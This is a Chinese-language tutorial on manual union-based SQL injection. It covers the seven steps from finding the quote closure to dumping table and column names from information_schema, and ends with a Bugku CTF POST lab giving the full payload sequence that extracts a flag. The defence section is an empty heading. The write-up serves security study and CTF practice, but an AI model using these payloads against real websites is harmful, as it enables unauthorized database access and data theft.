SQL注入之GET与POST手工注入

SQL注入原理：

　　SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。（源自百度百科）

SQL注入的分类：

按数据提交类型可分为：

SQL注入的防御：

GET和POST型手工注入步骤：

　　在MySQL数据库5.0版本以上都会包含一个information_schema数据库，其结构如下：

　　对于GET型和POST型，我们可以利用数据库的联合查询爆出想要的数据库信息，其步骤一般分为七步：

（1）求闭合字符。一般SQL语句的闭合形式有以下几种：　　

select * from user where id= 1;       #整形闭合
select * from user where id='1';       #单引号闭合
select * from user where id="1";      #双引号闭合
select * from user where id=('1');     #单引号加括号
select * from user where id=("1");     #双引号加括号

（2）求列数。一般使用order by语句求列数。

（3）求显示位。使用联合查询求显示位。

（4）爆数据库名。利用database()函数爆出数据库名。

（5）爆表名。利用group_concat()函数返回table_name。

　　group_concat()函数的作用是将group by产生的同一个分组中的值连接起来，返回一个字符串结果。

（6）爆列名。利用group_concat()函数返回column_name。

（7）爆字段名。利用group_concat()函数返回结果。

简单的POST注入实验：

题目来源：Bugku CTF

使用工具：Firefox浏览器，Hackbar插件

注入使用的语句（GET型手工注入的方法与此类似）：

id=1' and 1=1-- -　　#求闭合字符
id=1' and 1=1 order by 1,2,3,4-- -　　#求列数
id=4' and 1=1 union select 1,2,3,4-- -    #求显示位
id=4' and 1=1 union select 1,2,3,version()　　#爆数据库版本
id=4' and 1=1 union select 1,2,database(),4-- -　　#爆数据库名
id=4' and 1=1 union select 1,2,database(),group_concat(table_name) from information_schema.tables where table_schema=database()-- -　　#爆表名
id=4' and 1=1 union select 1,2,database(),group_concat(column_name) from information_schema.columns where table_schema=database()-- -　　#爆列名
id=4' and 1=1 union select 1,2,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'-- -
id=4' and 1=1 union select 1,2,database(),group_concat(skctf_flag) from fl4g-- -

表名：fl4g,sc
列名：skctf_flag,id,name,math,english,chinese
fl4g表中的列名：skctf_flag